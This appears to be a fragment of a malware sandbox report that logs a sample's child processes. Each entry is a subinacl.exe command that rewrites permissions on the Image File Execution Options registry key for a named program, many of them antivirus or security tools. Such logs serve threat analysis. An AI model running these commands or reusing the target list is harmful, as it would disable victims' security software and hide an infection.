    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpx.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4300
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrashService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4824
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscce.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2132
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrcs.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3148
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrs.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:836
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrsc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3376
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrssas.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1988
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrssl.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1336
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrsst.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2040
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssrs.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4796
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cureit.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2088
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dcsrv.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2740
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debugger" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1052
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2192
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DefenderDaemon.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1448
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeskLock.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3408
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Desktop Locker.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3488
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Desktop_Locker" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2344
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devencl.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1048
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dll32.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4792
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dmdjmg.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3064
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dmhelpserver.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3348
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Dr.Web.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3704
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DriverBooster.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3204
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Drop Box Update.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:372
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrWeb.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2204
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dsrviml.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2872
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DTLEP.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1976
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUB8.2.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2020
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUBrute.2.2.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2124
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUBrute.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1888
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUMeter.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:5016
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DUMeterSvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1004
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpnet.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4340
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwmr.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2964
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4840
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\econceal.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:832
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\econser.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3460
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\elogsvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2728
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EmailSpider.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2648
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\emlproxy.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4412
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\endpointintegration.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4780
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\endpointservice.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4944
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EnterpriseConsole.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2140
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4388
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\epag.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4632
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ErrorCheck.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2684
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ErrorsChecking.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - System Location Discovery: System Language Discovery
    PID:400
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\escanmon.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1796
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESERV.EXE" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3232
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\eset_antivirus.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1656
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\esetonlinescanner_enu.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4640
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESETPoweliksCleaner.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2668
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\esif.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:984
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ess.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4024
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EthDcrMiner64.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3992
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explores.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4172
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\expmon.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3152
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Fiddlere.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4148
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firewall_rules.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1512
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixmapi.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1828
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmefsh.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4648
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmefss.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3740
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmsh.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4856
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fmss.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4952
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ForcerX+__.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1920
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ForServiceApp.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3528
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FrameworkService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2284
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frdpb_v2.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2008
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frog.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4492
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsproflt.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2692
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsproflt2.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1064
- - C:\Windows\subinacl.exe
